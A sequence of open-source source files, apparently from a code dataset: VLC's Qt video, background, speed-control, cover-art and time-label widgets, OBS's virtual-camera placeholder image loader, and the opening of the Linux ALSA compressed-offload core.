 * Request the video to avoid the conflicts
 *
 * Creates the native "stable" child widget that the vout will render
 * into, and returns its window handle (0 if a video is already embedded).
 * When b_keep_size is set, the current widget size is reported back via
 * pi_width/pi_height.
 **/
WId VideoWidget::request( struct vout_window_t *p_wnd, unsigned int *pi_width,
                          unsigned int *pi_height, bool b_keep_size )
{
    if( stable )
    {
        msg_Dbg( p_intf, "embedded video already in use" );
        return 0;
    }
    assert( !p_window );

    if( b_keep_size )
    {
        *pi_width  = size().width();
        *pi_height = size().height();
    }

    /* The owner of the video window needs a stable handle (WinId). Reparenting
     * in Qt4-X11 changes the WinId of the widget, so we need to create another
     * dummy widget that stays within the reparentable widget. */
    stable = new QWidget();
    QPalette plt = palette();
    plt.setColor( QPalette::Window, Qt::black );
    stable->setPalette( plt );
    stable->setAutoFillBackground(true);
    /* Force the widget to be native so that it gets a winId() */
    stable->setAttribute( Qt::WA_NativeWindow, true );
    /* Indicates that the widget wants to draw directly onto the screen.
       Widgets with this attribute set do not participate in composition
       management */
    /* This is currently disabled on X11 as it does not seem to improve
     * performance, but causes the video widget to be transparent... */
#if !defined (Q_WS_X11) && !defined (Q_WS_QPA)
    stable->setAttribute( Qt::WA_PaintOnScreen, true );
#endif

    layout->addWidget( stable );

#ifdef Q_WS_X11
    /* HACK: Only one X11 client can subscribe to mouse button press events.
     * VLC currently handles those in the video display.
     * Force Qt4 to unsubscribe from mouse press and release events. */
    Display *dpy = QX11Info::display();
    Window w = stable->winId();
    XWindowAttributes attr;

    XGetWindowAttributes( dpy, w, &attr );
    attr.your_event_mask &= ~(ButtonPressMask|ButtonReleaseMask);
    XSelectInput( dpy, w, attr.your_event_mask );
#endif
    sync();
    p_window = p_wnd;
    return stable->winId();
}
/* Set the Widget to the correct Size */
/* Function has to be called by the parent
   Parent has to care about resizing itself */
void VideoWidget::SetSizing( unsigned int w, unsigned int h )
{
    resize( w, h );
    emit sizeChanged( w, h );
    /* Work-around a bug?misconception? that would happen when vout core resize
       twice to the same size and would make the vout not centered.
       This cause a small flicker.
       See #3621
     */
    if( (unsigned)size().width() == w && (unsigned)size().height() == h )
        updateGeometry();
    sync();
}
/** Report any widget resize to the attached vout window, if present. */
void VideoWidget::resizeEvent( QResizeEvent *event )
{
    const QSize newSize = event->size();
    if( p_window != NULL )
        vout_window_ReportSize( p_window, newSize.width(), newSize.height() );

    QWidget::resizeEvent( event );
}
/** Destroy the embedded video surface once the vout no longer needs it. */
void VideoWidget::release( void )
{
    msg_Dbg( p_intf, "Video is not needed anymore" );

    if( stable )
    {
        layout->removeWidget( stable );
        /* deleteLater(): the native window may still be in use this cycle */
        stable->deleteLater();
        stable = NULL;
        p_window = NULL;
    }

    updateGeometry();
}
/**********************************************************************
 * Background Widget. Show a simple image background. Currently,
 * it's album art if present or cone.
 **********************************************************************/
BackgroundWidget::BackgroundWidget( intf_thread_t *_p_i )
                 :QWidget( NULL ), p_intf( _p_i ), b_expandPixmap( false ), b_withart( true )
{
    /* A dark background */
    setAutoFillBackground( true );
    QPalette plt = palette();
    plt.setColor( QPalette::Active, QPalette::Window , Qt::black );
    plt.setColor( QPalette::Inactive, QPalette::Window , Qt::black );
    setPalette( plt );

    /* Init the cone art */
    defaultArt = QString( ":/logo/vlc128.png" );
    updateArt( "" );

    /* fade in animator: animates the "opacity" property read in paintEvent */
    setProperty( "opacity", 1.0 );
    fadeAnimation = new QPropertyAnimation( this, "opacity", this );
    fadeAnimation->setDuration( 1000 );
    fadeAnimation->setStartValue( 0.0 );
    fadeAnimation->setEndValue( 1.0 );
    fadeAnimation->setEasingCurve( QEasingCurve::OutSine );
    CONNECT( fadeAnimation, valueChanged( const QVariant & ),
             this, update() );

    /* Repaint with the new cover whenever the input's art changes */
    CONNECT( THEMIM->getIM(), artChanged( QString ),
             this, updateArt( const QString& ) );
}
/** Switch the displayed artwork, falling back to the cone when empty. */
void BackgroundWidget::updateArt( const QString& url )
{
    pixmapUrl = url.isEmpty() ? defaultArt : url;
    update();
}
/** Restart the artwork fade-in each time the widget is shown. */
void BackgroundWidget::showEvent( QShowEvent * e )
{
    Q_UNUSED( e );
    if ( b_withart )
        fadeAnimation->start();
}
/**
 * Paint the artwork centered in the widget, scaled down to fit or
 * (optionally) scaled up with an alpha mask to soften the enlargement.
 */
void BackgroundWidget::paintEvent( QPaintEvent *e )
{
    if ( !b_withart )
    {
        /* we just want background autofill */
        QWidget::paintEvent( e );
        return;
    }

    int i_maxwidth, i_maxheight;
    QPixmap pixmap = QPixmap( pixmapUrl );
    QPainter painter(this);
    QBitmap pMask;
    float f_alpha = 1.0;

    i_maxwidth  = __MIN( maximumWidth(), width() ) - MARGIN * 2;
    i_maxheight = __MIN( maximumHeight(), height() ) - MARGIN * 2;

    /* "opacity" is driven by fadeAnimation (see constructor) */
    painter.setOpacity( property( "opacity" ).toFloat() );

    if ( height() > MARGIN * 2 )
    {
        /* Scale down the pixmap if the widget is too small */
        if( pixmap.width() > i_maxwidth || pixmap.height() > i_maxheight )
        {
            pixmap = pixmap.scaled( i_maxwidth, i_maxheight,
                            Qt::KeepAspectRatio, Qt::SmoothTransformation );
        }
        else
        /* Scale up only when requested and the pixmap is smaller than us */
        if ( b_expandPixmap &&
             pixmap.width() < width() && pixmap.height() < height() )
        {
            /* Scale up the pixmap to fill widget's size */
            f_alpha = ( (float) pixmap.height() / (float) height() );
            pixmap = pixmap.scaled(
                    width() - MARGIN * 2,
                    height() - MARGIN * 2,
                    Qt::KeepAspectRatio,
                    ( f_alpha < .2 )? /* Don't waste cpu when not visible */
                        Qt::SmoothTransformation:
                        Qt::FastTransformation
                    );
            /* Non agressive alpha compositing when sizing up */
            pMask = QBitmap( pixmap.width(), pixmap.height() );
            pMask.fill( QColor::fromRgbF( 1.0, 1.0, 1.0, f_alpha ) );
            pixmap.setMask( pMask );
        }

        /* Center the (possibly rescaled) pixmap inside the margins */
        painter.drawPixmap(
                MARGIN + ( i_maxwidth - pixmap.width() ) /2,
                MARGIN + ( i_maxheight - pixmap.height() ) /2,
                pixmap);
    }
    QWidget::paintEvent( e );
}
/** Right-click opens the global VLC popup menu. */
void BackgroundWidget::contextMenuEvent( QContextMenuEvent *event )
{
    THEDP->setPopupMenu();
    event->accept();
}
/**
 * Seasonal background: cone with a Santa hat plus an animated snowfall.
 * The animation is off until animate() is called.
 */
EasterEggBackgroundWidget::EasterEggBackgroundWidget( intf_thread_t *p_intf )
    : BackgroundWidget( p_intf )
{
    flakes = new QLinkedList<flake *>();
    i_rate = 2;      /* max new flakes per tick */
    i_speed = 1;     /* pixels fallen per tick */
    b_enabled = false;
    timer = new QTimer( this );
    timer->setInterval( 100 );
    CONNECT( timer, timeout(), this, spawnFlakes() );
    /* NOTE(review): b_enabled was just set false, so this start() can
     * never fire here; the timer is actually started by animate(). */
    if ( isVisible() && b_enabled ) timer->start();
    defaultArt = QString( ":/logo/vlc128-xmas.png" );
    updateArt( "" );
}
/** Stop the animation and free every remaining flake. */
EasterEggBackgroundWidget::~EasterEggBackgroundWidget()
{
    timer->stop();
    delete timer;
    reset();      /* deletes the flake objects */
    delete flakes;
}
/** Resume the snowfall when shown (if animation was enabled). */
void EasterEggBackgroundWidget::showEvent( QShowEvent *e )
{
    if ( b_enabled ) timer->start();
    BackgroundWidget::showEvent( e );
}
/** Pause the snowfall and drop all flakes while hidden. */
void EasterEggBackgroundWidget::hideEvent( QHideEvent *e )
{
    timer->stop();
    reset();
    BackgroundWidget::hideEvent( e );
}
/** Flake positions depend on the widget size: restart on resize. */
void EasterEggBackgroundWidget::resizeEvent( QResizeEvent *e )
{
    reset();
    BackgroundWidget::resizeEvent( e );
}
/** Enable the snowfall; the timer starts now if we are visible. */
void EasterEggBackgroundWidget::animate()
{
    b_enabled = true;
    if ( isVisible() ) timer->start();
}
/**
 * Timer tick: move every flake down by i_speed, remove the ones that
 * left the widget, and spawn up to i_rate new ones at random x positions
 * (capped at MAX_FLAKES in flight).
 */
void EasterEggBackgroundWidget::spawnFlakes()
{
    if ( ! isVisible() ) return;

    /* scale factor so qrand() * w maps into [0, width()] */
    double w = (double) width() / RAND_MAX;

    int i_spawn = ( (double) qrand() / RAND_MAX ) * i_rate;

    QLinkedList<flake *>::iterator it = flakes->begin();
    while( it != flakes->end() )
    {
        flake *current = *it;
        current->point.setY( current->point.y() + i_speed );
        if ( current->point.y() + i_speed >= height() )
        {
            /* erase() returns the next valid iterator */
            delete current;
            it = flakes->erase( it );
        }
        else
            it++;
    }

    if ( flakes->size() < MAX_FLAKES )
    for ( int i=0; i<i_spawn; i++ )
    {
        flake *f = new flake;
        f->point.setX( qrand() * w );
        /* roughly one flake in three is drawn "fat" (5 pixels) */
        f->b_fat = ( qrand() < ( RAND_MAX * .33 ) );
        flakes->append( f );
    }
    update();
}
void EasterEggBackgroundWidget::reset()
{
while ( !flakes->isEmpty() )
delete flakes->takeFirst();
}
/** Draw the flakes in white on top of the regular background artwork. */
void EasterEggBackgroundWidget::paintEvent( QPaintEvent *e )
{
    QPainter painter(this);

    painter.setBrush( QBrush( QColor(Qt::white) ) );
    painter.setPen( QPen(Qt::white) );

    QLinkedList<flake *>::const_iterator it = flakes->constBegin();
    while( it != flakes->constEnd() )
    {
        const flake * const f = *(it++);
        if ( f->b_fat )
        {
            /* Xsnow like :p -- diamond of four pixels around the center */
            painter.drawPoint( f->point.x(), f->point.y() -1 );
            painter.drawPoint( f->point.x() + 1, f->point.y() );
            painter.drawPoint( f->point.x(), f->point.y() +1 );
            painter.drawPoint( f->point.x() - 1, f->point.y() );
        }
        else
        {
            painter.drawPoint( f->point );
        }
    }

    BackgroundWidget::paintEvent( e );
}
/* Dead code: legacy audio visualization selector panel, compiled out
 * with "#if 0". Kept for reference only; nothing below is built. */
#if 0
#include <QPushButton>
#include <QHBoxLayout>
/**********************************************************************
 * Visualization selector panel
 **********************************************************************/
VisualSelector::VisualSelector( intf_thread_t *_p_i ) :
QFrame( NULL ), p_intf( _p_i )
{
QHBoxLayout *layout = new QHBoxLayout( this );
layout->setMargin( 0 );
QPushButton *prevButton = new QPushButton( "Prev" );
QPushButton *nextButton = new QPushButton( "Next" );
layout->addWidget( prevButton );
layout->addWidget( nextButton );
layout->addStretch( 10 );
layout->addWidget( new QLabel( qtr( "Current visualization" ) ) );
current = new QLabel( qtr( "None" ) );
layout->addWidget( current );
BUTTONACT( prevButton, prev() );
BUTTONACT( nextButton, next() );
setLayout( layout );
setMaximumHeight( 35 );
}
VisualSelector::~VisualSelector()
{}
/* Cycle to the previous visualization and show its name. */
void VisualSelector::prev()
{
char *psz_new = aout_VisualPrev( p_intf );
if( psz_new )
{
current->setText( qfu( psz_new ) );
free( psz_new );
}
}
/* Cycle to the next visualization and show its name. */
void VisualSelector::next()
{
char *psz_new = aout_VisualNext( p_intf );
if( psz_new )
{
current->setText( qfu( psz_new ) );
free( psz_new );
}
}
#endif
/* Status-bar label showing the playback rate (e.g. "1.00x"); clicking
 * it pops up a SpeedControlWidget wrapped in a QMenu. */
SpeedLabel::SpeedLabel( intf_thread_t *_p_intf, QWidget *parent )
: QLabel( parent ), p_intf( _p_intf )
{
tooltipStringPattern = qtr( "Current playback speed: %1\nClick to adjust" );
/* Create the Speed Control Widget */
speedControl = new SpeedControlWidget( p_intf, this );
speedControlMenu = new QMenu( this );
QWidgetAction *widgetAction = new QWidgetAction( speedControl );
widgetAction->setDefaultWidget( speedControl );
speedControlMenu->addAction( widgetAction );
/* Change the SpeedRate in the Label */
CONNECT( THEMIM->getIM(), rateChanged( float ), this, setRate( float ) );
DCONNECT( THEMIM, inputChanged( input_thread_t * ),
speedControl, activateOnState() );
setContentsMargins(4, 0, 4, 0);
/* seed the label with the inherited rate before any event arrives */
setRate( var_InheritFloat( THEPL, "rate" ) );
}
SpeedLabel::~SpeedLabel()
{
/* The menu is also a QObject child of this label, so this explicit
 * delete only makes the teardown order deterministic. */
delete speedControlMenu;
}
/****************************************************************************
* Small right-click menu for rate control
****************************************************************************/
void SpeedLabel::showSpeedMenu( QPoint pos )
{
    /* Pop the rate menu roughly centred below the label. */
    QPoint where = QCursor::pos() - pos
                 + QPoint( -70 + width() / 2, height() );
    speedControlMenu->exec( where );
}
void SpeedLabel::setRate( float rate )
{
    /* Format the rate as "N.NNx", refresh the tooltip and keep the
     * popup slider in sync. */
    QString str = QString::number( rate, 'f', 2 ) + "x";
    setText( str );
    setToolTip( tooltipStringPattern.arg( str ) );
    speedControl->updateControls( rate );
}
/**********************************************************************
* Speed control widget
**********************************************************************/
/* Popup widget with a logarithmic rate slider plus slower/1x/faster
 * buttons; range -34..34 ticks maps to 0.25x..4x (17 ticks per octave). */
SpeedControlWidget::SpeedControlWidget( intf_thread_t *_p_i, QWidget *_parent )
: QFrame( _parent ), p_intf( _p_i )
{
QSizePolicy sizePolicy( QSizePolicy::Fixed, QSizePolicy::Maximum );
sizePolicy.setHorizontalStretch( 0 );
sizePolicy.setVerticalStretch( 0 );
speedSlider = new QSlider( this );
speedSlider->setSizePolicy( sizePolicy );
speedSlider->setMinimumSize( QSize( 140, 20 ) );
speedSlider->setOrientation( Qt::Horizontal );
speedSlider->setTickPosition( QSlider::TicksBelow );
/* +/-34 ticks at 17 ticks per doubling, see updateControls() */
speedSlider->setRange( -34, 34 );
speedSlider->setSingleStep( 1 );
speedSlider->setPageStep( 1 );
speedSlider->setTickInterval( 17 );
CONNECT( speedSlider, valueChanged( int ), this, updateRate( int ) );
QToolButton *normalSpeedButton = new QToolButton( this );
normalSpeedButton->setMaximumSize( QSize( 26, 16 ) );
normalSpeedButton->setAutoRaise( true );
normalSpeedButton->setText( "1x" );
normalSpeedButton->setToolTip( qtr( "Revert to normal play speed" ) );
CONNECT( normalSpeedButton, clicked(), this, resetRate() );
QToolButton *slowerButton = new QToolButton( this );
slowerButton->setMaximumSize( QSize( 26, 16 ) );
slowerButton->setAutoRaise( true );
slowerButton->setToolTip( tooltipL[SLOWER_BUTTON] );
slowerButton->setIcon( QIcon( iconL[SLOWER_BUTTON] ) );
CONNECT( slowerButton, clicked(), THEMIM->getIM(), slower() );
QToolButton *fasterButton = new QToolButton( this );
fasterButton->setMaximumSize( QSize( 26, 16 ) );
fasterButton->setAutoRaise( true );
fasterButton->setToolTip( tooltipL[FASTER_BUTTON] );
fasterButton->setIcon( QIcon( iconL[FASTER_BUTTON] ) );
CONNECT( fasterButton, clicked(), THEMIM->getIM(), faster() );
/* spinBox = new QDoubleSpinBox();
spinBox->setDecimals( 2 );
spinBox->setMaximum( 32 );
spinBox->setMinimum( 0.03F );
spinBox->setSingleStep( 0.10F );
spinBox->setAlignment( Qt::AlignRight );
CONNECT( spinBox, valueChanged( double ), this, updateSpinBoxRate( double ) ); */
QGridLayout* speedControlLayout = new QGridLayout( this );
speedControlLayout->addWidget( speedSlider, 0, 0, 1, 3 );
speedControlLayout->addWidget( slowerButton, 1, 0 );
speedControlLayout->addWidget( normalSpeedButton, 1, 1, 1, 1, Qt::AlignRight );
speedControlLayout->addWidget( fasterButton, 1, 2, 1, 1, Qt::AlignRight );
//speedControlLayout->addWidget( spinBox );
speedControlLayout->setContentsMargins( 0, 0, 0, 0 );
speedControlLayout->setSpacing( 0 );
lastValue = 0;
activateOnState();
}
void SpeedControlWidget::activateOnState()
{
/* Allow rate changes only while an input is active. */
speedSlider->setEnabled( THEMIM->getIM()->hasInput() );
//spinBox->setEnabled( THEMIM->getIM()->hasInput() );
}
void SpeedControlWidget::updateControls( float rate )
{
if( speedSlider->isSliderDown() )
{
//We don't want to change anything if the user is using the slider
return;
}
double value = 17 * log( rate ) / log( 2. );
int sliderValue = (int) ( ( value > 0 ) ? value + .5 : value - .5 );
if( sliderValue < speedSlider->minimum() )
{
sliderValue = speedSlider->minimum();
}
else if( sliderValue > speedSlider->maximum() )
{
sliderValue = speedSlider->maximum();
}
lastValue = sliderValue;
speedSlider->setValue( sliderValue );
//spinBox->setValue( rate );
}
void SpeedControlWidget::updateRate( int sliderValue )
{
/* Slider moved: convert the logarithmic tick back into a rate and
 * push it to the input manager. lastValue breaks the feedback loop
 * caused by updateControls() programmatically moving the slider. */
if( sliderValue == lastValue )
return;
double speed = pow( 2, (double)sliderValue / 17 );
/* the core expresses rate as INPUT_RATE_DEFAULT divided by speed */
int rate = INPUT_RATE_DEFAULT / speed;
THEMIM->getIM()->setRate(rate);
//spinBox->setValue( var_InheritFloat( THEPL, "rate" ) );
}
void SpeedControlWidget::updateSpinBoxRate( double r )
{
/* Slot for the (currently commented-out) spin box: set rate directly. */
var_SetFloat( THEPL, "rate", r );
}
void SpeedControlWidget::resetRate()
{
/* "1x" button: return to normal playback speed. */
THEMIM->getIM()->setRate( INPUT_RATE_DEFAULT );
}
/* 128x128 label showing the current item's cover art, with a context
 * menu to download art or pick it from a local file. Holds a gc
 * reference on the tracked input item. */
CoverArtLabel::CoverArtLabel( QWidget *parent, intf_thread_t *_p_i )
: QLabel( parent ), p_intf( _p_i ), p_item( NULL )
{
setContextMenuPolicy( Qt::ActionsContextMenu );
CONNECT( THEMIM->getIM(), artChanged( input_item_t * ),
this, showArtUpdate( input_item_t * ) );
setMinimumHeight( 128 );
setMinimumWidth( 128 );
setScaledContents( false );
setAlignment( Qt::AlignCenter );
QAction *action = new QAction( qtr( "Download cover art" ), this );
CONNECT( action, triggered(), this, askForUpdate() );
addAction( action );
action = new QAction( qtr( "Add cover art from file" ), this );
CONNECT( action, triggered(), this, setArtFromFile() );
addAction( action );
/* pick up the item that is already playing, if any */
p_item = THEMIM->currentInputItem();
if( p_item )
{
vlc_gc_incref( p_item );
showArtUpdate( p_item );
}
else
showArtUpdate( "" );
}
CoverArtLabel::~CoverArtLabel()
{
    /* Detach our context-menu actions, then release the gc reference
     * we hold on the tracked input item. */
    foreach( QAction *act, actions() )
        removeAction( act );
    if ( p_item )
        vlc_gc_decref( p_item );
}
void CoverArtLabel::setItem( input_item_t *_p_item )
{
    /* Swap the tracked input item, keeping gc refcounts balanced.
     * Take the new reference BEFORE dropping the old one: the old
     * order (decref then incref) could free the item and then incref
     * dangling memory when the same item was set again and the decref
     * released the last reference. */
    if ( _p_item )
        vlc_gc_incref( _p_item );
    if ( p_item )
        vlc_gc_decref( p_item );
    p_item = _p_item;
}
void CoverArtLabel::showArtUpdate( const QString& url )
{
    /* Display the artwork at 'url', scaled to fill the label; fall
     * back to the bundled placeholder when loading fails. */
    QPixmap pix;
    const bool loaded = !url.isEmpty() && pix.load( url );
    if( loaded )
    {
        pix = pix.scaled( minimumWidth(), minimumHeight(),
                          Qt::KeepAspectRatioByExpanding,
                          Qt::SmoothTransformation );
    }
    else
    {
        pix = QPixmap( ":/noart.png" );
    }
    setPixmap( pix );
}
void CoverArtLabel::showArtUpdate( input_item_t *_p_item )
{
    /* Art-changed notification: ignore items we are not tracking. */
    if ( _p_item != p_item )
        return;
    QString url;
    if ( _p_item )
        url = THEMIM->getIM()->decodeArtURL( _p_item );
    showArtUpdate( url );
}
void CoverArtLabel::askForUpdate()
{
/* Context-menu action: ask the core to (re)fetch cover art. */
THEMIM->getIM()->requestArtUpdate( p_item, true );
}
/* Context-menu action: let the user pick a local image file and set
 * it as cover art for the tracked item. No-op without an item. */
void CoverArtLabel::setArtFromFile()
{
if( !p_item )
return;
QString filePath = QFileDialog::getOpenFileName( this, qtr( "Choose Cover Art" ),
p_intf->p_sys->filepath, qtr( "Image Files (*.gif *.jpg *.jpeg *.png)" ) );
if( filePath.isEmpty() )
return;
/* the core expects a URL, not a filesystem path */
QString fileUrl = QUrl::fromLocalFile( filePath ).toString();
THEMIM->getIM()->setArt( p_item, fileUrl );
}
void CoverArtLabel::clear()
{
/* Revert to the placeholder artwork. */
showArtUpdate( "" );
}
/* Clickable time display. Depending on displayType it shows elapsed
 * time, total/remaining time, or both; the remaining-time preference
 * is persisted in the settings for non-elapsed modes. */
TimeLabel::TimeLabel( intf_thread_t *_p_intf, TimeLabel::Display _displayType )
: ClickableQLabel(), p_intf( _p_intf ), displayType( _displayType )
{
b_remainingTime = false;
if( _displayType != TimeLabel::Elapsed )
b_remainingTime = getSettings()->value( "MainWindow/ShowRemainingTime", false ).toBool();
/* placeholder text and tooltip per mode, before any position event */
switch( _displayType ) {
case TimeLabel::Elapsed:
setText( " --:-- " );
setToolTip( qtr("Elapsed time") );
break;
case TimeLabel::Remaining:
setText( " --:-- " );
setToolTip( qtr("Total/Remaining time")
+ QString("\n-")
+ qtr("Click to toggle between total and remaining time")
);
break;
case TimeLabel::Both:
setText( " --:--/--:-- " );
setToolTip( QString( "- " )
+ qtr( "Click to toggle between elapsed and remaining time" )
+ QString( "\n- " )
+ qtr( "Double click to jump to a chosen time position" ) );
break;
}
setAlignment( Qt::AlignRight | Qt::AlignVCenter );
CONNECT( THEMIM->getIM(), positionUpdated( float, int64_t, int ),
this, setDisplayPosition( float, int64_t, int ) );
setStyleSheet( "QLabel { padding-left: 4px; padding-right: 4px; }" );
}
/* Position update from the input manager.
 * pos: normalized position (-1 means "no input"), t: elapsed time in
 * microseconds, length: stream length in seconds. */
void TimeLabel::setDisplayPosition( float pos, int64_t t, int length )
{
if( pos == -1.f )
{
setMinimumSize( QSize( 0, 0 ) );
if( displayType == TimeLabel::Both )
setText( "--:--/--:--" );
else
setText( "--:--" );
return;
}
/* microseconds -> seconds */
int time = t / 1000000;
secstotimestr( psz_length, length );
secstotimestr( psz_time, ( b_remainingTime && length ) ? length - time
: time );
// compute the minimum size that will be required for the psz_length
// and use it to enforce a minimal size to avoid "dancing" widgets
QSize minsize( 0, 0 );
if ( length > 0 )
{
QMargins margins = contentsMargins();
minsize += QSize(
fontMetrics().size( 0, QString( psz_length ), 0, 0 ).width(),
sizeHint().height()
);
minsize += QSize( margins.left() + margins.right() + 8, 0 ); /* +padding */
if ( b_remainingTime )
minsize += QSize( fontMetrics().size( 0, "-", 0, 0 ).width(), 0 );
}
switch( displayType )
{
case TimeLabel::Elapsed:
setMinimumSize( minsize );
setText( QString( psz_time ) );
break;
case TimeLabel::Remaining:
if( b_remainingTime )
{
setMinimumSize( minsize );
setText( QString("-") + QString( psz_time ) );
}
else
{
setMinimumSize( QSize( 0, 0 ) );
setText( QString( psz_length ) );
}
break;
case TimeLabel::Both:
default:
/* "-mm:ss/MM:SS" — leading '-' only in remaining mode, "--:--"
 * length when the stream length is unknown but time advances */
QString timestr = QString( "%1%2/%3" )
.arg( QString( (b_remainingTime && length) ? "-" : "" ) )
.arg( QString( psz_time ) )
.arg( QString( ( !length && time ) ? "--:--" : psz_length ) );
setText( timestr );
break;
}
/* remember the length so the position-only overload can work */
cachedLength = length;
}
/* Position-only update (e.g. while seeking): derive the time from the
 * normalized position and the length cached by the full overload. */
void TimeLabel::setDisplayPosition( float pos )
{
if( pos == -1.f || cachedLength == 0 )
{
setText( " --:--/--:-- " );
return;
}
int time = pos * cachedLength;
secstotimestr( psz_time,
( b_remainingTime && cachedLength ?
cachedLength - time : time ) );
QString timestr = QString( "%1%2/%3" )
.arg( QString( (b_remainingTime && cachedLength) ? "-" : "" ) )
.arg( QString( psz_time ) )
.arg( QString( ( !cachedLength && time ) ? "--:--" : psz_length ) );
setText( timestr );
}
void TimeLabel::toggleTimeDisplay()
{
    /* Flip elapsed/remaining mode and persist the preference. */
    b_remainingTime = !b_remainingTime;
    getSettings()->setValue( "MainWindow/ShowRemainingTime", b_remainingTime );
}
| gpl-2.0 |
ZixiVideo/obs-studio | plugins/win-dshow/virtualcam-module/placeholder.cpp | 3 | 2770 | #include <windows.h>
#include <strsafe.h>
#include <gdiplus.h>
#include <stdint.h>
#include <vector>
using namespace Gdiplus;
extern HINSTANCE dll_inst;
static std::vector<uint8_t> placeholder;
static bool initialized = false;
int cx, cy;
/* XXX: optimize this later. or don't, it's only called once. */
/* XXX: optimize this later. or don't, it's only called once. */
/* Convert the decoded 24bpp bitmap into the module-global
 * 'placeholder' buffer: a full-size luma plane followed by
 * interleaved, 2x2-averaged chroma (NV12-style layout, 3/2 bytes per
 * pixel). Pass 1 converts every pixel to packed Y/U/V using integer
 * BT.601 coefficients; pass 2 walks two rows at a time, keeping Y per
 * pixel and averaging U/V over each 2x2 block.
 * NOTE(review): the first byte of each input pixel is treated as
 * blue — presumably GDI+ 24bppRGB byte order; confirm against the
 * LockBits caller. Assumes width and height are even. */
static void convert_placeholder(const uint8_t *rgb_in, int width, int height)
{
size_t size = width * height * 3;
size_t linesize = width * 3;
std::vector<uint8_t> yuv_out;
yuv_out.resize(size);
const uint8_t *in = rgb_in;
const uint8_t *end = in + size;
uint8_t *out = &yuv_out[0];
while (in < end) {
const int16_t b = *(in++);
const int16_t g = *(in++);
const int16_t r = *(in++);
*(out++) = (uint8_t)(((66 * r + 129 * g + 25 * b + 128) >> 8) +
16);
*(out++) = (uint8_t)(((-38 * r - 74 * g + 112 * b + 128) >> 8) +
128);
*(out++) = (uint8_t)(((112 * r - 94 * g - 18 * b + 128) >> 8) +
128);
}
placeholder.resize(width * height * 3 / 2);
in = &yuv_out[0];
end = in + size;
out = &placeholder[0];
/* chroma plane starts right after the luma plane */
uint8_t *chroma = out + width * height;
while (in < end) {
/* in/out walk the even row, in2/out2 the odd row below it */
const uint8_t *in2 = in + linesize;
const uint8_t *end2 = in2;
uint8_t *out2 = out + width;
while (in < end2) {
int16_t u;
int16_t v;
*(out++) = *(in++);
u = *(in++);
v = *(in++);
*(out++) = *(in++);
u += *(in++);
v += *(in++);
*(out2++) = *(in2++);
u += *(in2++);
v += *(in2++);
*(out2++) = *(in2++);
u += *(in2++);
v += *(in2++);
*(chroma++) = (uint8_t)(u / 4);
*(chroma++) = (uint8_t)(v / 4);
}
/* skip the odd row we already consumed */
in = in2;
out = out2;
}
}
/* Locate placeholder.png next to this DLL, decode it with GDI+, and
 * convert it into the global placeholder buffer. Returns false on any
 * failure. Requires GDI+ to be started by the caller. */
static bool load_placeholder_internal()
{
Status s;
wchar_t file[MAX_PATH];
if (!GetModuleFileNameW(dll_inst, file, MAX_PATH)) {
return false;
}
/* replace the DLL file name with "placeholder.png" */
wchar_t *slash = wcsrchr(file, '\\');
if (!slash) {
return false;
}
slash[1] = 0;
StringCbCat(file, sizeof(file), L"placeholder.png");
Bitmap bmp(file);
if (bmp.GetLastStatus() != Status::Ok) {
return false;
}
cx = bmp.GetWidth();
cy = bmp.GetHeight();
BitmapData bmd = {};
Rect r(0, 0, cx, cy);
s = bmp.LockBits(&r, ImageLockModeRead, PixelFormat24bppRGB, &bmd);
if (s != Status::Ok) {
return false;
}
convert_placeholder((const uint8_t *)bmd.Scan0, cx, cy);
bmp.UnlockBits(&bmd);
return true;
}
bool initialize_placeholder()
{
GdiplusStartupInput si;
ULONG_PTR token;
GdiplusStartup(&token, &si, nullptr);
initialized = load_placeholder_internal();
GdiplusShutdown(token);
return initialized;
}
/* Pixel data of the converted placeholder, or null before a
 * successful initialize_placeholder(). */
const uint8_t *get_placeholder_ptr()
{
	return initialized ? placeholder.data() : nullptr;
}
/* Report the placeholder dimensions; returns false if it never loaded.
 * NOTE(review): the top-level const on the bool return type is
 * meaningless (-Wignored-qualifiers); kept only to match the existing
 * declaration elsewhere. */
const bool get_placeholder_size(int *out_cx, int *out_cy)
{
if (initialized) {
*out_cx = cx;
*out_cy = cy;
return true;
}
return false;
}
| gpl-2.0 |
chadouming/faster-angler | sound/core/compress_offload.c | 3 | 27541 | /*
* compress_core.c - compress offload core
*
* Copyright (C) 2011 Intel Corporation
* Authors: Vinod Koul <vinod.koul@linux.intel.com>
* Pierre-Louis Bossart <pierre-louis.bossart@linux.intel.com>
* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; version 2 of the License.
*
* This program is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
*
* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*
*/
#define FORMAT(fmt) "%s: %d: " fmt, __func__, __LINE__
#define pr_fmt(fmt) KBUILD_MODNAME ": " FORMAT(fmt)
#include <linux/file.h>
#include <linux/fs.h>
#include <linux/list.h>
#include <linux/math64.h>
#include <linux/mm.h>
#include <linux/mutex.h>
#include <linux/poll.h>
#include <linux/slab.h>
#include <linux/sched.h>
#include <linux/types.h>
#include <linux/uio.h>
#include <linux/uaccess.h>
#include <linux/module.h>
#include <sound/core.h>
#include <sound/initval.h>
#include <sound/compress_params.h>
#include <sound/compress_offload.h>
#include <sound/compress_driver.h>
/* TODO:
* - add substream support for multiple devices in case of
* SND_DYNAMIC_MINORS is not used
* - Multiple node representation
* driver should be able to register multiple nodes
*/
static DEFINE_MUTEX(device_mutex);
struct snd_compr_file {
unsigned long caps;
struct snd_compr_stream stream;
};
/*
* a note on stream states used:
* we use following states in the compressed core
* SNDRV_PCM_STATE_OPEN: When stream has been opened.
* SNDRV_PCM_STATE_SETUP: When stream has been initialized. This is done by
* calling SNDRV_COMPRESS_SET_PARAMS. running streams will come to this
* state at stop by calling SNDRV_COMPRESS_STOP, or at end of drain.
* SNDRV_PCM_STATE_PREPARED: When snd_compr_write() has been called in
* SNDRV_PCM_STATE_SETUP state. SNDRV_COMPRESS_START can only be called in
* SNDRV_PCM_STATE_PREPARED state.
